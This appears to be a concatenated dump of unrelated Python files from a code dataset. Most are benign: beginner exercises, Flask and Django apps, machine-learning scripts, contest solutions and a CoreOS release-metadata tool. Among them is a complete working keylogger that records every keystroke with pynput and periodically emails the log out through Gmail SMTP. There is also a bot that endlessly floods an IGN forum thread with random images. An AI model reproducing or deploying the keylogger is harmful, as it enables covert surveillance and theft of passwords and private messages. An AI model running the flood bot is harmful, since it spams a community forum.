tempo = int(input('Quantos anos ntem seu carro? '))
if tempo <=3:
print('Carro novo')
else:
print('Carro velho')
print('---FIM---')
'''
### condição simplificada
'''
tempo = int(input('Quantos anos ntem seu carro? '))
print('Carro novo' if tempo <=3 else 'Carro velho')
print('---FIM---')
'''
###Brincando
### Condição composta
'''
nome = str(input('Qual e o seu nome? ')).strip().capitalize()
if nome == 'Jean':
print('Que nome lindo vc tem!')
else:
print('Seu nome é tão normal!')
print('Bom dia, {}!'.format(nome))
'''
### Condição composta
'''
n1 = float(input('Digite a primeira nota: '))
n2 = float(input('Digite a segunda nota: '))
m = (n1 + n2)/2
print('Sua média foi {:.1f}'.format(m))
if m >= 6.0:
print('Você foi aprovado, PARABÊNS!')
else:
print('Você foi reprovado, estude mais da proxima vez!')
'''
### Condição simplificada
'''
n1 = float(input('Digite a primeira nota: '))
n2 = float(input('Digite a segunda nota: '))
m = (n1 + n2)/2
print('Sua média foi {:.1f}'.format(m))
print('PARABÊNS!' if m >= 6 else 'Estude mais!')
'''
|
""" server.py """
from flask import Flask, request, jsonify, render_template
from pymongo import MongoClient
import json
MONGODB_HOST = 'localhost'
MONGODB_PORT = 27017
app = Flask(__name__)
app.config.from_object(__name__)
app.config['MONGO_DBNAME'] = "mainAPP"
#connection = MongoClient('localhost', 27017)
connection = MongoClient(app.config['MONGODB_HOST'], app.config['MONGODB_PORT'])
@app.route('/')
def index():
pass
@app.route('/login')
def login():
return render_template("login.html")
@app.route('/users/', methods=['GET'])
def show_users():
db = connection['mainAPP']
collection = db.users
users = collection.find()
existing_users = []
for user in users:
usr = {'username': str(user['username']),
'email': str(user['email']),
'skills': user['skills']}
existing_users.append(usr)
return render_template("index.html", existingUsers=json.dumps(existing_users))
@app.route('/<username>')
def show_users_stuff(username):
db = connection['mainAPP']
collection = db.users
users = collection.find_one({"username": str(username)})
app.logger.info(users)
if users:
usr = {'username': str(username),
'email': str(users['email']),
'skills': users['skills']}
return render_template("user.html", existingUser=json.dumps(usr))
else:
return "not found!"
@app.route('/<username>/add_skill', methods=['GET', 'POST'])
def add_user_skill(username):
db = connection['mainAPP']
collection = db.users
user = collection.find_one({"username": str(username)})
if user and request.method == 'POST':
user[u'skills'].append(request.json)
collection.update({"username": str(username)}, {"$set": user}, upsert=False)
return "aa"
@app.route('/<username>/remove_skill', methods=['GET', 'POST'])
def remove_user_skill(username):
db = connection['mainAPP']
collection = db.users
user = collection.find_one({"username": str(username)})
if user and request.method == 'POST':
for skill in user[u'skills']:
if skill.keys()[0] == request.data:
user[u'skills'].remove(skill)
collection.update({"username": str(username)}, {"$set": user}, upsert=False)
return "aa"
@app.route('/<username>/add_todo', methods=['GET', 'POST'])
def add_skill_todo(username):
db = connection['mainAPP']
collection = db.users
user = collection.find_one({"username": str(username)})
if user and request.method == 'POST':
skill_in_use = request.json['skill_in_use']
new_todo = request.json['newTodo']
for skill in user[u'skills']:
if skill.keys()[0] == skill_in_use:
user[u'skills'][user[u'skills'].index(skill)][skill_in_use].append(new_todo)
collection.update({"username": str(username)}, {"$set": user}, upsert=False)
return "aa"
@app.route('/<username>/remove_todo', methods=['GET', 'POST'])
def remove_skill_todo(username):
db = connection['mainAPP']
collection = db.users
user = collection.find_one({"username": str(username)})
if user and request.method == 'POST':
skill_in_use = request.json['skill_in_use']
todo = request.json['Todo']
for skill in user[u'skills']:
if skill.keys()[0] == skill_in_use:
user[u'skills'][user[u'skills'].index(skill)][skill_in_use].remove(todo)
app.logger.info(user[u'skills'])
collection.update({"username": str(username)}, {"$set": user}, upsert=False)
return "aa"
#@app.route('/add/<username>', methods=['GET'])
#def add_user(username):
# db = connection['mainAPP']
# collection = db.users
# r = collection.find_one({'username': username})
# if r is None:
# user = {'username': username,
# 'email': u'root@localhost',
# 'skills': [{'skill_name1': ['todo1', 'todo2']}, {'skill_name2': ['todo3', 'todo4']}]}
#
# collection.insert(user)
# return "inserted"
# else:
# return "skipped because user exists!"
if __name__ == '__main__':
app.run(host='0.0.0.0', port=8000, debug=True) |
import tensorflow as tf
import numpy as np
import optimizer as om
import dataset as ds
import matplotlib.pyplot as plt
from PIL import Image as pi
import model
import time
import os
EPOCH_NUM = 500
def main():
print('Loading MNIST dataset...')
mnist = ds.Dataset()
mnist.load(ds.MNIST, '../MNIST/')
model_save_dir = './model_trained/'
train_log_dir = './train_log/'
if not os.path.exists(model_save_dir):
os.mkdir(model_save_dir)
if not os.path.exists(train_log_dir):
os.mkdir(train_log_dir)
batch_size = 3
mnist.set_batch_size(batch_size)
t_x, t_labels, t_gt_labels, t_err = model.mnist_model(mnist.shape_of_sample(), [16,32,16], mnist.shape_of_label())
batch_num = int(EPOCH_NUM * len(mnist.train_samples)/batch_size)
# create an optimizer for training
opt = om.Optimizer()
minimizer = opt.minimize(t_err)
sess = tf.Session()
saver = tf.train.Saver()
sess.run(tf.global_variables_initializer())
tf.summary.scalar('loss', t_err)
merge_summary = tf.summary.merge_all()
train_writer = tf.summary.FileWriter(train_log_dir,s ess.graph)
for i in xrange(batch_num):
x, gt_labels = mnist.train_batch()
err,_,summary = sess.run([t_err, minimizer, merge_summary],
feed_dict={t_x:x, t_gt_labels:gt_labels.astype(np.int32)})
minimizer = opt.update(sess, err)
if i%100==0:
print('batch=%d epoch=%d err=%.6f'%(i,int(i*batch_size/len(mnist.train_samples)), err))
train_writer.add_summary(summary, int(i/100))
if minimizer == None:
model_path = os.path.join(
model_save_dir,
time.strftime('Y%Ym%md%dH%HM%MS%S',
time.localtime(int(time.time()))))
print('final model saved to %s'%model_path)
saver.save(sess, model_path)
exit(0)
else:
if i%10000==0:
model_path = os.path.join(
model_save_dir,
time.strftime('Y%Ym%md%dH%HM%MS%S',
time.localtime(int(time.time()))))
print('saving model to %s'%model_path)
saver.save(sess, model_path)
'''
x,y = mnist.test()
rand_id = np.random.randint(len(x))
plt.imshow(x[rand_id].reshape([x.shape[1], x.shape[2]]))
plt.show()
print(str(y[rand_id]))
'''
main()
|
# https://atcoder.jp/contests/abc233/tasks/abc233_b
# # def input(): return sys.stdin.readline().rstrip()
# # input = sys.stdin.readline
# from numba import njit
# from functools import lru_cache
# import sys
# input = sys.stdin.buffer.readline
# sys.setrecursionlimit(10 ** 7)
L, R = map(int, input().split())
S = input()
ans = ""
ans += S[:L-1]
ans += S[L-1:R][::-1]
ans += S[R:]
print(ans)
# S = input()
# n = int(input())
# N, K = map(int, input().split())
# l = list(map(int, (input().split())))
# A = [[int(i) for i in input().split()] for _ in range(N)]
# import sys
# it = map(int, sys.stdin.buffer.read().split())
# N = next(it)
# @njit('(i8,i8[::1],i4[::1])', cache=True)
# def main():
# @lru_cache(None)
# def dfs():
# return
# return
# main()
|
from sklearn.model_selection import StratifiedKFold
from sklearn.model_selection import cross_val_score
from data import X, y
from train import rf, xgb, gb, et, sv
kfold = StratifiedKFold(n_splits=3, random_state=17)
rf_results = cross_val_score(rf, X, y, cv=kfold, n_jobs=4)
xgb_results = cross_val_score(xgb, X, y, cv=kfold, n_jobs=4)
gb_results = cross_val_score(gb, X, y, cv=kfold, n_jobs=4)
et_results = cross_val_score(et, X, y, cv=kfold, n_jobs=4)
sv_results = cross_val_score(sv, X, y, cv=kfold, n_jobs=4)
print("Accuracy: %.2f%% (%.2f%%)" % (rf_results.mean()*100, rf_results.std()*100))
print("Accuracy: %.2f%% (%.2f%%)" % (xgb_results.mean()*100, xgb_results.std()*100))
print("Accuracy: %.2f%% (%.2f%%)" % (gb_results.mean()*100, gb_results.std()*100))
print("Accuracy: %.2f%% (%.2f%%)" % (et_results.mean()*100, et_results.std()*100))
print("Accuracy: %.2f%% (%.2f%%)" % (sv_results.mean()*100, sv_results.std()*100))
# RF Accuracy: 94.52% (2.09%)
# XGB Accuracy: 96.35% (1.72%)
# GB Accuracy: 97.26% (1.00%)
# ET Accuracy: 90.12% (1.13%)
# SV Accuracy: 95.89% (1.13%)
# after hyperparameter tuning:
# RF Accuracy: 93.92% (2.06%)
# XGB Accuracy: 96.35% (1.72%)
# GB Accuracy: 96.96% (0.95%)
# ET Accuracy: 93.77% (1.13%)
# SV Accuracy: 98.93% (0.57%)
# after hyperparameter tuning rerun:
# RF Accuracy: 94.92% (0.17%)
# XGB Accuracy: 96.81% (1.16%)
# GB Accuracy: 96.57% (1.02%)
# ET Accuracy: 94.10% (0.45%)
# SV Accuracy: 98.11% (0.60%)
# Ensemble Accuracy: 97.83% (0.80%) |
"""
A, B and Modulo
Problem Description
Given two integers A and B, find the greatest possible positive M, such that A % M = B % M.
Problem Constraints
1 <= A, B <= 10^9
A != B
Input Format
The first argument given is the integer, A.
The second argument given is the integer, B.
Output Format
Return an integer denoting greatest possible positive M.
Example Input
Input 1:
A = 1
B = 2
Input 2:
A = 5
B = 10
Example Output
Output 1:
1
Output 2:
5
Example Explanation
Explanation 1:
1 is the largest value of M such that A % M == B % M.
Explanation 2:
For M = 5, A % M = 0 and B % M = 0.
No value greater than M = 5, satisfies the condition.
"""
class Solution:
# @param A : integer
# @param B : integer
# @return an integer
def solve(self, A, B):
return abs(A-B) |
from messy import Base
from sqlalchemy import Column, Integer, String, Boolean, DateTime, Text, ForeignKey
from sqlalchemy.orm import relationship
class Chatroom(Base):
__tablename__ = 'chatrooms'
id = Column(Integer, primary_key=True)
title = Column(String(200))
member_limit = Column(Integer)
private = Column(Boolean)
password = Column(String(200))
type = Column(String(50))
updated_at = Column(DateTime)
created_at = Column(DateTime)
deleted_at = Column(DateTime)
members = relationship("ChatroomMember")
messages = relationship("ChatroomMessage")
class ChatroomMessage(Base):
__tablename__ = 'chatroom_messages'
id = Column(Integer, primary_key=True)
user_id = Column(Integer)
chatroom_id = Column(Integer, ForeignKey('chatrooms.id'))
message = Column(Text)
type = Column(String(50))
updated_at = Column(DateTime)
created_at = Column(DateTime)
|
import requests
from time import sleep
from igninterage import Igninterage
"""flood no tpc de imagens random"""
"""https://www.ignboards.com/threads/topico-das-imagens-randoms.455505695/"""
TOPICO = '455505695'
TEMPO = 200 # segundos
def gur():
""" Retorna img random do imgur.
"""
r = requests.get('https://imgur.com/random', timeout=7)
uOut = f"{r.url.replace('gallery/', '')}.jpg"
rs = requests.get(uOut)
if len(rs.history) == 1:
return uOut
else:
return gur()
def imgflood():
ign = Igninterage('https://www.ignboards.com/')
ign.ign_login()
while True:
try:
g = gur()
if g:
ign.comentar(f'[img]{g}[/img]', TOPICO)
else:
print('erro ao recuperar imagem, continuando...')
except Exception as err1:
print(f'Erro, ih rapaz: {err1}. Tentando novamente...')
sleep(TEMPO)
if __name__ == '__main__':
#print(gur())
imgflood()
|
from django.apps import AppConfig
class EasyifscapiConfig(AppConfig):
name = 'easyifscapi'
|
'''
DESAFIO 041
Crie um programa que leia o ano de nascmento de um atleta.
e mostre sua categoria,de acordo com a idade:
- Até 9 anos: MIRIM - Até 25 anos: SÊnior
- Até 14 anos: INFANTIL - Acima: MASTER
- Até 19 anos: JUNIOR
'''
from datetime import date
ano_atual = date.today().year
nasc = int(input('Ano de nascimento: '))
idade = ano_atual - nasc
print(f'Quem nasceu em {nasc} tem {idade} anos em {ano_atual}')
if idade <= 9:
print(f'Categoria: MIRIM.')
elif idade <= 14:
print(f'Categoria: INFANTIL.')
elif idade <= 19:
print(f'Categoria: JUNIOR.')
elif idade <= 25:
print(f'Categoria: SÊNIOR.')
else:
print(f'Categoria: MASTER.')
|
#!/usr/bin/env python3
# Convert a coreos-assembler build into a "release.json"
# Originally from https://github.com/coreos/fedora-coreos-releng-automation/blob/main/coreos-meta-translator/trans.py
# See also https://github.com/coreos/fedora-coreos-tracker/blob/main/Design.md#release-streams
from argparse import ArgumentParser
import json
import os
import requests
from cosalib.builds import Builds
FCOS_STREAM_ENDPOINT = "https://builds.coreos.fedoraproject.org/prod/streams"
def ensure_dup(inp, out, inp_key, out_key):
'''
If the out dictionary does not contain a value for out_key update it
to be equal to the inp dictionaries inp_key value, if it does exist
ensure the values are equal between the two dictionaries
'''
inv = inp.get(inp_key)
v = out.setdefault(out_key, inv)
if v != inv:
raise Exception(f"Input Files do not appear to be for the same release ({v} != {inv})")
def url_builder(stream, version, arch, path):
return f"{args.stream_baseurl}/{stream}/builds/{version}/{arch}/{path}"
def get_extension(path, modifier, arch):
return path.rsplit(f'{modifier}.{arch}')[1][1:]
parser = ArgumentParser()
parser.add_argument("--workdir", help="cosa workdir")
parser.add_argument("--build-id", help="build id")
parser.add_argument("--distro", help="Distro selects stream defaults such as baseurl and format", choices=['fcos', 'rhcos'])
parser.add_argument("--stream-name", help="Override the stream ID (default is derived from coreos-assembler)")
parser.add_argument("--stream-baseurl", help="Override prefix URL for stream content", default=FCOS_STREAM_ENDPOINT)
parser.add_argument("--output", help="Output to file; default is build directory")
parser.add_argument("--url", help="URL to a coreos-assembler meta.json", default=[], action='append')
parser.add_argument("--no-signatures", help="Disable signature references", action='store_true')
args = parser.parse_args()
def gather_buildmeta_from_workdir():
builds = Builds()
# default to latest build if not specified
if args.build_id:
buildid = args.build_id
else:
buildid = builds.get_latest()
print(f"Creating release.json for build {buildid}")
base_builddir = f"builds/{buildid}"
arches = builds.get_build_arches(buildid)
parsed_builds = []
for arch in arches:
with open(os.path.join(base_builddir, arch, "meta.json")) as f:
parsed_builds.append(json.load(f))
return (base_builddir, parsed_builds)
out = {}
parsed_builds = []
if len(args.url) == 0:
# FIXME: Remove this once https://github.com/coreos/fedora-coreos-pipeline/ is ported
# not to pass --workdir (it always uses `.` anyways)
if args.workdir not in (None, '.'):
os.chdir(args.workdir)
(builddir, parsed_builds) = gather_buildmeta_from_workdir()
# Default to writing into the builddir for now
if args.output is None:
args.output = os.path.join(builddir, "release.json")
else:
for url in args.url:
print(f"Downloading {url}...")
r = requests.get(url)
r.raise_for_status()
parsed_builds.append(r.json())
# If any existing data, inherit it (if it's non-empty)
if os.path.exists(args.output) and os.stat(args.output).st_size > 0:
with open(args.output, 'r') as w:
out = json.load(w)
print(f"Using existing release file {args.output}")
def get_floating_tag(rel, tags):
found = ""
for tag in tags:
if rel not in tag:
if found != "":
raise f"multiple floating tags within: {tags}"
found = tag
if found == "":
raise f"failed to find floating tag within: {tags}"
return found
# Append the coreos-assembler build json `input_` to `out`, the target release stream.
def append_build(out, input_):
arch = input_.get("coreos-assembler.basearch")
ensure_dup(input_, out, "buildid", "release")
streamnamesrc = None
if args.stream_name:
streamnamesrc = {'branch': args.stream_name}
else:
streamnamesrc = input_.get('coreos-assembler.container-config-git')
ensure_dup(streamnamesrc, out, 'branch', 'stream')
def artifact(i):
base_url = url_builder(out.get('stream'), out.get('release'), arch, i.get('path'))
sig = "{}.sig".format(base_url)
if args.no_signatures:
sig = ''
return {
"location": base_url,
"signature": sig,
"sha256": i.get("sha256"),
"uncompressed-sha256": i.get("uncompressed-sha256")
}
print(f"{out['stream']} stream")
print(f" {arch} images:")
# build the architectures dict
arch_dict = {"media": {}}
ensure_dup(input_, arch_dict, "ostree-commit", "commit")
platforms = ["aliyun", "applehv", "aws", "azure", "azurestack", "digitalocean", "exoscale", "gcp", "hyperv", "ibmcloud", "kubevirt", "metal", "nutanix", "openstack", "powervs", "qemu", "virtualbox", "vmware", "vultr", "qemu-secex"]
for platform in platforms:
if input_.get("images", {}).get(platform, None) is not None:
print(f" - {platform}")
i = input_.get("images").get(platform)
ext = get_extension(i.get('path'), platform, arch)
arch_dict['media'][platform] = {
"artifacts": {
ext: {
"disk": artifact(i)
}
}
}
# Aliyun/AWS specific additions
for meta_key, cloud, image_field in ("aliyun", "aliyun", "id"), ("amis", "aws", "hvm"):
if input_.get(meta_key, None) is not None:
arch_dict["media"].setdefault(cloud, {}).setdefault("images", {})
for cloud_dict in input_.get(meta_key):
arch_dict["media"][cloud]["images"][cloud_dict["name"]] = {
"image": cloud_dict[image_field]
}
# IBMCloud/PowerVS specific additions
for meta_key, cloud, object_field, bucket_field, url_field in \
("ibmcloud", "ibmcloud", "object", "bucket", "url"), \
("powervs", "powervs", "object", "bucket", "url"):
if input_.get(meta_key, None) is not None:
arch_dict["media"].setdefault(cloud, {}).setdefault("images", {})
for cloud_dict in input_.get(meta_key):
arch_dict["media"][cloud]["images"][cloud_dict["region"]] = {
"object": cloud_dict[object_field],
"bucket": cloud_dict[bucket_field],
"url": cloud_dict[url_field]
}
# IBM Secure Execution specific additions
i = input_.get("images", {}).get("ignition-gpg-key", None)
if i is not None:
arch_dict["media"]["qemu-secex"]["ignition-gpg-key"] = artifact(i)
# GCP specific additions
if input_.get("gcp", None) is not None:
arch_dict["media"].setdefault("gcp", {}).setdefault("image", {})
arch_dict["media"]["gcp"]["image"].update(input_.get("gcp", {}))
arch_dict["media"]["gcp"]["image"]["name"] = arch_dict["media"]["gcp"]["image"].pop("image")
# remove the url as we haven't decided to expose that information publicly yet
arch_dict["media"]["gcp"]["image"].pop("url")
# KubeVirt specific additions: https://github.com/coreos/stream-metadata-go/pull/41
if input_.get("kubevirt", None) is not None:
arch_dict["media"].setdefault("kubevirt", {}).setdefault("image", {})
# The `image` field uses a floating tag and the `digest-ref` field uses
# a digest pullspec. See: https://github.com/coreos/stream-metadata-go/pull/46.
tag = get_floating_tag(input_["buildid"], input_["kubevirt"]["tags"])
arch_dict["media"]["kubevirt"]["image"] = {
"image": input_["kubevirt"]["image"] + f":{tag}",
"digest-ref": input_["kubevirt"]["image"] + "@" + input_["kubevirt"]["digest"],
}
# Azure: https://github.com/coreos/stream-metadata-go/issues/13
inputaz = input_.get("azure")
if inputaz is not None:
rhcosext = arch_dict.setdefault("rhel-coreos-extensions", {})
rhcosext["azure-disk"] = {
"url": inputaz["url"]
}
# metal specific additions
arch_dict["media"]["metal"] = arch_dict["media"].get("metal", {})
arch_dict["media"]["metal"]["artifacts"] = arch_dict["media"]["metal"].get("artifacts", {})
i = input_.get("images", {}).get("metal4k", None)
if i is not None:
# the 4k image is kinda weird; we want it at the same level as e.g.
# the regular 512b image, which normally is under `raw.xz`
ext = get_extension(i['path'], 'metal4k', arch)
arch_dict["media"]["metal"]["artifacts"][f"4k.{ext}"] = {
"disk": artifact(i)
}
i = input_.get("images", {}).get("iso", None)
if i is not None:
arch_dict["media"]["metal"]["artifacts"]["installer.iso"] = {
"disk": artifact(i)
}
i = input_.get("images", {}).get("kernel", None)
if i is not None:
arch_dict["media"]["metal"]["artifacts"].setdefault("installer-pxe", {})["kernel"] = artifact(i)
i = input_.get("images", {}).get("initramfs", None)
if i is not None:
arch_dict["media"]["metal"]["artifacts"].setdefault("installer-pxe", {})["initramfs"] = artifact(i)
i = input_.get("images", {}).get("live-iso", None)
if i is not None:
arch_dict["media"]["metal"]["artifacts"]["iso"] = {
"disk": artifact(i)
}
i = input_.get("images", {}).get("live-kernel", None)
if i is not None:
arch_dict["media"]["metal"]["artifacts"].setdefault("pxe", {})["kernel"] = artifact(i)
i = input_.get("images", {}).get("live-initramfs", None)
if i is not None:
arch_dict["media"]["metal"]["artifacts"].setdefault("pxe", {})["initramfs"] = artifact(i)
i = input_.get("images", {}).get("live-rootfs", None)
if i is not None:
arch_dict["media"]["metal"]["artifacts"].setdefault("pxe", {})["rootfs"] = artifact(i)
# if architectures as a whole or the individual arch is empty just push our changes
if out.get('architectures', None) is None or out['architectures'].get(arch, None) is None:
oa = out.get('architectures', {})
oa[arch] = arch_dict
out['architectures'] = oa
# else check media warning if key present, appending if not
else:
out_arch = out['architectures'][arch]
for media_type, val in arch_dict.get('media').items():
if media_type not in out_arch['media']:
out['architectures'][arch]['media'].update({media_type: val})
elif val == out_arch['media'][media_type]:
continue
else:
raise Exception("differing content detected for media type '{}'".format(media_type))
for build in parsed_builds:
append_build(out, build)
with open(args.output, 'w') as w:
json.dump(out, w)
print(f"Successfully wrote release file at {args.output}")
|
#
# AUTHOR: Natchapol Srisang (UtopiaBeam)
# KEYWORD: Topological ordering
#
n, m = map(int, input().split())
edges = [tuple(map(int, input().split())) for _ in range(m)]
for _ in range(5):
ls = list(map(int, input().split()))
dc = dict(zip(ls, range(n)))
for s, e in edges:
if dc[s] > dc[e]:
print('FAIL')
break
else:
print('SUCCESS')
|
from django.contrib import admin
from django.contrib.auth.admin import UserAdmin
from .models import *
@admin.register(Food)
class FoodAdmin(admin.ModelAdmin):
list_display = ('id', 'name', 'portion', 'portion_unit', 'fats', 'protein', 'sodium', 'carbohidrates', 'cholesterol','calories', 'created_at', 'last_updated_at',)
@admin.register(Group)
class GroupAdmin(admin.ModelAdmin):
list_display = ('id', 'name','created_at', 'last_updated_at',)
@admin.register(Category)
class CategoryAdmin(admin.ModelAdmin):
list_display = ('id', 'name', 'created_at', 'last_updated_at',)
admin.site.register(User, UserAdmin)
|
from django.db import models
from listings.models import Country, Province, City, Zone, OpertationType, PropertyType
# Create your models here.
class CountryData(models.Model):
"""
EACH DATA POINT REPRESENTS ONE MONTH
- Each time a new listing is saved the state in the
current month is updated if it already exist, otherwise
a new data point is created
- Calculations are made based on the previous state
and the new listing to avoid recalculations
"""
operation_type = models.ForeignKey(OpertationType, on_delete=models.SET_NULL, null=True)
property_type = models.ForeignKey(PropertyType, on_delete=models.SET_NULL, null=True)
country = models.ForeignKey(Country, on_delete=models.SET_NULL, null=True)
date = models.DateField(auto_now_add=True)
price = models.IntegerField()
rooms = models.IntegerField()
bedrooms = models.IntegerField()
bathrooms = models.IntegerField()
surface_total = models.IntegerField()
surface_covered = models.IntegerField()
class ProvinceData(models.Model):
"""
EACH DATA POINT REPRESENTS ONE MONTH
- Each time a new listing is saved the state in the
current month is updated if it already exist, otherwise
a new data point is created
- Calculations are made based on the previous state
and the new listing to avoid recalculations
"""
operation_type = models.ForeignKey(OpertationType, on_delete=models.SET_NULL, null=True)
property_type = models.ForeignKey(PropertyType, on_delete=models.SET_NULL, null=True)
province = models.ForeignKey(Province, on_delete=models.SET_NULL, null=True)
date = models.DateField(auto_now_add=True)
price = models.IntegerField()
rooms = models.IntegerField()
bedrooms = models.IntegerField()
bathrooms = models.IntegerField()
surface_total = models.IntegerField()
surface_covered = models.IntegerField()
class CityData(models.Model):
#data by location
operation_type = models.ForeignKey(OpertationType, on_delete=models.SET_NULL, null=True)
property_type = models.ForeignKey(PropertyType, on_delete=models.SET_NULL, null=True)
city = models.ForeignKey(City, on_delete=models.SET_NULL, null=True)
date = models.DateField(auto_now_add=True)
price = models.IntegerField()
rooms = models.IntegerField()
bedrooms = models.IntegerField()
bathrooms = models.IntegerField()
surface_total = models.IntegerField()
surface_covered = models.IntegerField()
class ZoneData(models.Model):
#data by location
operation_type = models.ForeignKey(OpertationType, on_delete=models.SET_NULL, null=True)
property_type = models.ForeignKey(PropertyType, on_delete=models.SET_NULL, null=True)
zone = models.ForeignKey(Zone, on_delete=models.SET_NULL, null=True)
date = models.DateField(auto_now_add=True)
price = models.IntegerField()
rooms = models.IntegerField()
bedrooms = models.IntegerField()
bathrooms = models.IntegerField()
surface_total = models.IntegerField()
surface_covered = models.IntegerField()
|
import requests
from bs4 import BeautifulSoup
url = "https://www.yelp.ca/search?find_desc=Restaurants&find_loc=Sherwood+Park%2C+AB&ns=1"
yelp_r = requests.get(url)
print(yelp_r.status_code)
yelp_soup = BeautifulSoup(yelp_r.text, 'html.parser')
#print(yelp_soup.prettify())
#print(yelp_soup.findAll('a'))
# Pull Page Title
#print ("\nThe Page Title is: " + yelp_soup.title.text)
#for link in yelp_soup.findAll('a'):
# print(link.get('href'))
print(yelp_soup.find("div", class_="secondary-attributes"))
print(yelp_soup.find_all("title"))
|
import hashlib
#Expect bytes as inputs
input_as_bytes = b"Hola soy un string!"
first_output = hashlib.sha256(input_as_bytes)
#Only H to h changed
input_as_bytes_changed = b"hola soy un string!"
second_output = hashlib.sha256(input_as_bytes_changed)
print(f"First input: {input_as_bytes}")
print(first_output.hexdigest())
print("##############################")
print(f"Second input: {input_as_bytes_changed}")
print(second_output.hexdigest())
print("##############################")
print(f"Are the same?: {first_output.hexdigest() == second_output.hexdigest()}") |
import pynput.keyboard #this library allow us to manage user keyboard and mouse
import threading
import smtplib
import optparse
log =""
def getargs():
parser = optparse.OptionParser() #command line options and arguments
parser.add_option("-e","--email",dest="email",help="your email")
parser.add_option("-p","--password",dest="password",help="your email password")
parser.add_option("-i","--interval",dest="interval",help="enter the time interval")
(options,arg) = parser.parse_args()
if not options.email:
parser.error("Please Specify email --help for more info")
elif not options.password:
parser.error("please provide password --help for more info")
elif not options.interval:
parser.error("please provide interval --help for more info")
return options
option = getargs()
def process_key_press(key):
global log
try:
log=log+str(key.char)
except AttributeError:
if(key == key.space):
log= log + " "
else:
log =log + " "+str(key)+" "
def send_mail(email, password,message):
server = smtplib.SMTP("smtp.gmail.com",587)
server.starttls()
server.login(email,password)
server.sendmail(email,email,message)
server.quit()
def report():
global log
send_mail(option.email,option.password,log)
log=""
timer = threading.Timer(int(option.interval),report) # use threding because we need report generation within interval
timer.start()
keyboard_listner = pynput.keyboard.Listener(on_press = process_key_press)
with keyboard_listner:
print("https://myaccount.google.com/lesssecureapps?pli=1 make sure less secure app enable")
report()
keyboard_listner.join()
|
from django.shortcuts import render
from game.models import Oyunlar
from haberler.models import Haber,AddFavoriHaber, YorumHaber
from forum.models import Forum, Yorumforum, LikeYorum, LikeForum
from user.models import AddMyFriends, User
def anasayfa(request):
oyun_active=Oyunlar.objects.order_by("?").first()
oyun=Oyunlar.objects.exclude(id=oyun_active.id).order_by("?")[:2]
haberlerr=Haber.objects.all().order_by("-toplamBegenme")[:6]
guncelHaberler=Haber.objects.all().order_by("-id")[:5]
liste=list()
for i in haberlerr:
kontrol=AddFavoriHaber.objects.filter(haber=i).first()
if kontrol is not None:
liste.append(str(AddFavoriHaber.objects.filter(haber=i).count()))
else:
liste.append("0")
liste2=list()
for i in haberlerr:
kontrol=YorumHaber.objects.filter(yorumHaber=i).first()
if kontrol is not None:
liste2.append(str(YorumHaber.objects.filter(yorumHaber=i).count()))
else:
liste2.append("0")
zipp=zip(haberlerr, liste, liste2)
paylasimlargüncel=Forum.objects.all().order_by("-BegenmeSayısı")[:5]
if request.user.is_authenticated:
arkadaslar=AddMyFriends.objects.filter(ekleyen=request.user).values("eklenen")
arkadaslarr=User.objects.filter(id__in=arkadaslar).order_by("-last_login")
else:
arkadaslarr="Giriş Yapılmamış"
context={
"oyunlar":oyun,
"oyunlar_active":oyun_active,
"haberlerr":zipp,
"paylasimlargüncel":paylasimlargüncel,
"arkadaslar":arkadaslarr,
}
return render(request,"anaSayfa.html", context) |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.